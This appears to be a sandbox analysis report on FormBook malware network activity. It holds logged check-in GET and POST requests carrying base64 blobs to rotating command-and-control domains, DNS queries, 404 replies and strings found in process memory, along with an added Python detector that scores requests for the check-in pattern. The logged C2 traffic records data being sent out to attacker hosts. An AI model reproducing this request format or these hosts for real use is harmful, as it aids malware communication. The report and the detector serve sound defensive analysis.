Source: global traffic | HTTP traffic detected: GET /x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4jdHwr2Bp5gqY7NYKc3aa2dAjtLrrS76KgS6f/xOF9OiJ7sHgK1x6zEV9Cyr40=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.bayarcepat19.click | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /f06i/?9X=EvKH2xeP-DpP307P&nhl=g1MS1+fiN19fuwYlcBKOU4UzmmsLW0eBYO/90R9nimGtqEGAgI0kE5yyF7WRrE+n+De2SPMKz1ZHlS6i60EYe6+HnhjgGN2ua7X3RkxuKgzxjrOTLKTNX9U= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.030002304.xyz | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /0r1y/?nhl=tIIzfNHYepvUcRk9trWFbq+Vuj9A/9CkRl+P/BNExRvW72uzdJWKh6aY9ntqwJ0nOl4wOlHuQy62kEbE4ANiAO3fzo3wUkeE47Ek0wt7hGUXEVOfdvkMJcQ=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.doggieradio.net | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.mybartendinglife.club | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /udtr/?nhl=JWRCMib9Ab6yKGK9tVnY1k7oTlzf3FlCZv+JaD8ekJd2eSGus8uX9j1aomNbYcA4VfgdKRJwSCfsWTeuLYlP9NwC5xq+bIEo1S2z3eaxb1ZDoYcdhdFludY=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.ntn.solar | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /n2yx/?9X=EvKH2xeP-DpP307P&nhl=iVeOj9H/jw8/ZkXx4eLZhuHPSRtHACVus0wk2djKTDBvc5j/YX614YP79ezpmvAo29KgRB3gLhtmSCFZBXQ4/utJh3JZlsU8+sR9ZpZpYA5vc3CvDS3ciOs= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.technew.shop | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /w6me/?nhl=ZQVtGrOiyfGmX0Bj7aOLb6McZZRaKXEecgRoMf1rX1qYBYk54P5+D+BVBTSMCHRrFOCnGQPC2mKGS9yi7bLDo6yarw5+jQ0DwziRuqiIpXFZxXsIN5XtUDU=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.allpop.xyz | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /c0mi/?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.zingara.life | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /1jig/?nhl=Pctx1PqJ8MApDnItio/Z+EFnrX0P+O6aDAf1ocJJBNfVobZUkvZZH3rRaqwxixVCcZIN7U7Xpqfz9fbsrPgf8JYUk12Pjtd3LjDyQQ9aa4jR42mhfhGkGD0=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.thepeatear.online | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /7cee/?nhl=LO11cYuPDN+V6ulgbSQlbQhpKz952Uhe3dYdUk54a5ewrOC/uvvn5bRLfbUUmCEUWVML7qGOWOxZJM3qSQiiVpBT5y4/s1qW1sM6t7L30BdH3o50b80t3Z0=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.kx507981.shop | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /77wx/?nhl=7ua6JbFlh1WLJoaoNlAsRfuIF2sTJF6LcTXb+zyHp2SVRtSd1ym3pm1J8yCDVb0000UvVw5gSTI/Vgi/faUhMgUdHvrcPrlqAqbrORdxYiGJRn981ClOzM4=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.teerra.shop | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /51t8/?nhl=m7B14gWZ3tTp+Si7ZmYNMzAQVPiIRhKeZLAtkzFkwSvyWpqHTy62LwfcTz9vRoaiRTwb/KbEqTho7SSr6qx+JXj6A7Si0P86LNCZt8nEBft2KH0FBAqzAzY=&9X=EvKH2xeP-DpP307P HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.agilizeimob.app | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | HTTP traffic detected: GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1 | Accept: */* | Accept-Language: en-US,en;q=0.9 | Host: www.sealofsea.xyz | Connection: close | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Source: global traffic | DNS traffic detected: DNS query: www.sealofsea.xyz
Source: global traffic | DNS traffic detected: DNS query: www.firstcry.shop
Source: global traffic | DNS traffic detected: DNS query: www.languyenthuyduyen.xyz
Source: global traffic | DNS traffic detected: DNS query: www.bayarcepat19.click
Source: global traffic | DNS traffic detected: DNS query: www.030002304.xyz
Source: global traffic | DNS traffic detected: DNS query: www.doggieradio.net
Source: global traffic | DNS traffic detected: DNS query: www.mybartendinglife.club
Source: global traffic | DNS traffic detected: DNS query: www.ntn.solar
Source: global traffic | DNS traffic detected: DNS query: www.technew.shop
Source: global traffic | DNS traffic detected: DNS query: www.allpop.xyz
Source: global traffic | DNS traffic detected: DNS query: www.zingara.life
Source: global traffic | DNS traffic detected: DNS query: www.thepeatear.online
Source: global traffic | DNS traffic detected: DNS query: www.kx507981.shop
Source: global traffic | DNS traffic detected: DNS query: www.teerra.shop
Source: global traffic | DNS traffic detected: DNS query: www.asociacia.online
Source: global traffic | DNS traffic detected: DNS query: www.agilizeimob.app
Source: unknown | HTTP traffic detected: POST /2mvq/ HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9 | Host: www.firstcry.shop | Cache-Control: max-age=0 | Content-Length: 200 | Content-Type: application/x-www-form-urlencoded | Connection: close | Origin: http://www.firstcry.shop | Referer: http://www.firstcry.shop/2mvq/ | User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1 | Data Ascii: nhl=4devIqXCoA5z0MN4HwUCqoNyQ6p/LTdlqsMwVDhzWZRz806Zkx53eunMl8/KMXYsIc8S8w5BvRk8dPEKx40w0AEBINYMW8qkMQMltS4u0sYwKyAkpMk7nxflcYjm56Dvii2CMJXhqKj/zxtrfZkrs/jfvgqOP97tgNQwhY27CecrFsx9M2GkJE6t6H3umaMNzw==
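Every check-in above has the same shape: the whole path is one four-character directory, the query (or, for the POST, the form body) carries a long base64-looking blob in `nhl` next to a short parameter that is identical in all sixteen requests (9X=EvKH2xeP-DpP307P), and the User-Agent is a Symbian-era Opera Mobile string sent from a Windows 10 host. The classifier below is an added example by the editor; it is not the Emerging Threats rule 2050745 (whose body is not on this page) and not Joe Sandbox code. The three signals are read off the requests above, while the 80-character blob threshold and the two-signal alert level are the editor's assumptions. The first two sample requests are copied from the report; the third is constructed as a benign comparison.

```python
"""Score raw HTTP requests for the FormBook check-in shape seen in this report (added example)."""
import re
from typing import Any, Dict, List
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")          # e.g. /a54a/ or /2mvq/
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")      # base64 alphabet, optional padding
MIN_BLOB_LEN = 80   # assumption: shorter values are not counted as payload blobs
THRESHOLD = 2       # assumption: two of the three signals raise an alert


def split_params(qs: str) -> Dict[str, str]:
    """Split k=v&k=v without percent-decoding, so '+' and '/' inside blobs survive intact."""
    out: Dict[str, str] = {}
    for pair in qs.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            out[key] = value
    return out


def parse_request(raw: str) -> Dict[str, Any]:
    """Minimal HTTP/1.1 request parser: request line, headers, form body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = split_params(url.query)
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update(split_params(body))
    return {"method": method, "path": url.path, "headers": headers, "params": params}


def classify(raw: str) -> Dict[str, Any]:
    """Return host, path, the signals that fired and whether the threshold was reached."""
    req = parse_request(raw)
    reasons: List[str] = []
    if PATH_RE.match(req["path"]):
        reasons.append("path is a single four-character directory")
    blobs = [k for k, v in req["params"].items() if len(v) >= MIN_BLOB_LEN and B64_RE.fullmatch(v)]
    if blobs:
        reasons.append(f"base64-like payload in parameter(s) {blobs}")
    ua = req["headers"].get("user-agent", "")
    if "Opera Mobi" in ua and "SymbOS" in ua:
        reasons.append("Symbian Opera Mobile User-Agent")
    return {
        "host": req["headers"].get("host", ""),
        "method": req["method"],
        "path": req["path"],
        "score": len(reasons),
        "reasons": reasons,
        "alert": len(reasons) >= THRESHOLD,
    }


UA = "Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1"

# The first two requests are copied from the report; the third is constructed.
SAMPLES: Dict[str, str] = {
    "get_checkin": "\r\n".join([
        "GET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1",
        "Accept: */*",
        "Accept-Language: en-US,en;q=0.9",
        "Host: www.sealofsea.xyz",
        "Connection: close",
        f"User-Agent: {UA}",
        "", "",
    ]),
    "post_checkin": "\r\n".join([
        "POST /2mvq/ HTTP/1.1",
        "Accept: */*",
        "Host: www.firstcry.shop",
        "Content-Length: 200",
        "Content-Type: application/x-www-form-urlencoded",
        "Connection: close",
        "Origin: http://www.firstcry.shop",
        "Referer: http://www.firstcry.shop/2mvq/",
        f"User-Agent: {UA}",
        "",
        "nhl=4devIqXCoA5z0MN4HwUCqoNyQ6p/LTdlqsMwVDhzWZRz806Zkx53eunMl8/KMXYsIc8S8w5BvRk8dPEKx40w0AEBINYMW8qkMQMltS4u0sYwKyAkpMk7nxflcYjm56Dvii2CMJXhqKj/zxtrfZkrs/jfvgqOP97tgNQwhY27CecrFsx9M2GkJE6t6H3umaMNzw==",
    ]),
    "benign": "\r\n".join([
        "GET /index.html?lang=en HTTP/1.1",
        "Host: example.com",
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0",
        "Connection: keep-alive",
        "", "",
    ]),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        verdict = classify(raw)
        print(name, verdict["host"], verdict["score"], verdict["alert"], verdict["reasons"])
```

The domains rotate (sixteen different hosts in five minutes, most of them returning 404 because only the live C2 answers), so a detection keyed on hostnames or IPs from this report will age within days; the request shape and the User-Agent are what carry across samples.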
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Wed, 09 Oct 2024 11:03:28 GMT | vary: User-Agent | Data Ascii:
<!DOCTYPE html>
<html style="height:100%">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<title> 404 Not Found
</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
<div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
        <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>
<h2 style="margin-top:20px;font-size: 30px;">Not Found
</h2>
<p>The resource requested could not be found on this server!</p>
</div></div></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Wed, 09 Oct 2024 11:03:31 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Wed, 09 Oct 2024 11:03:34 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Wed, 09 Oct 2024 11:03:36 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:23 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:25 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:28 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:31 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:36 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:39 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:42 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:44 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:50 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              x-sorting-hat-podid: 156
              x-sorting-hat-shopid: 68129128605
              vary: Accept-Encoding,Accept
              x-frame-options: DENY
              x-shopid: 68129128605
              x-shardid: 156
              content-language: en-IN
              x-shopify-nginx-no-cookies: 0
              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Lax
              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Lax
              set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:50 GMT; SameSite=Lax
              set-cookie: _shopify_y=1df4171f-fe86-4c92-af19-6810bd200ea4; Expires=Thu, 09-Oct-25 11:04:50 GMT; Domain=zingara.life; Path=/; SameSite=Lax
              set-cookie: _shopify_s=7853b78d-753d-4f3f-a5db-c02e04aff0ef; Expires=Wed, 09-Oct-24 11:34:50 GMT; Domain=zingara.life; Path=/; SameSite=
              Data Raw:
              Data Ascii:
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:53 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              x-sorting-hat-podid: 156
              x-sorting-hat-shopid: 68129128605
              vary: Accept-Encoding,Accept
              x-frame-options: DENY
              x-shopid: 68129128605
              x-shardid: 156
              content-language: en-IN
              x-shopify-nginx-no-cookies: 0
              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Lax
              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Lax
              set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:53 GMT; SameSite=Lax
              set-cookie: _shopify_y=4c54a4ea-beee-4680-9a75-6cf216a3001a; Expires=Thu, 09-Oct-25 11:04:53 GMT; Domain=zingara.life; Path=/; SameSite=Lax
              set-cookie: _shopify_s=0d286487-46fd-43a6-a5f2-12cc4ec5e7eb; Expires=Wed, 09-Oct-24 11:34:53 GMT; Domain=zingara.life; Path=/; SameSite=
              Data Raw:
              Data Ascii:
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 09 Oct 2024 11:04:55 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              x-sorting-hat-podid: 156
              x-sorting-hat-shopid: 68129128605
              vary: Accept-Encoding,Accept
              x-frame-options: DENY
              x-shopid: 68129128605
              x-shardid: 156
              content-language: en-IN
              x-shopify-nginx-no-cookies: 0
              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Lax
              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Lax
              set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:55 GMT; SameSite=Lax
              set-cookie: _shopify_y=101d33f6-59dc-43c5-a1bb-c6ef86b34ba2; Expires=Thu, 09-Oct-25 11:04:55 GMT; Domain=zingara.life; Path=/; SameSite=Lax
              set-cookie: _shopify_s=9dea918b-c5fe-4834-b024-5be6d8b36844; Expires=Wed, 09-Oct-24 11:34:55 GMT; Domain=zingara.life; Path=/; SameSite=
              Data Raw:
              Data Ascii:
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r1.crl0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://i.pki.goog/r1.crt0
          Source: choice.exe, 00000005.00000002.708581961090.0000000006C9C000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.000000000467C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://kx507945.shop
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: SjhnWvlTMw.exe, 00000006.00000002.708576743698.0000000000F63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.agilizeimob.app
          Source: SjhnWvlTMw.exe, 00000006.00000002.708576743698.0000000000F63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.agilizeimob.app/51t8/
          Source: choice.exe, 00000005.00000002.708581961090.0000000005CE8000.00000004.10000000.00040000.00000000.sdmp, SjhnWvlTMw.exe, 00000006.00000002.708580526921.00000000036C8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2Vd
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
          Source: firefox.exe, 00000008.00000003.705628365611.00000204FE498000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: choice.exe, 00000005.00000002.708584614701.00000000083CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
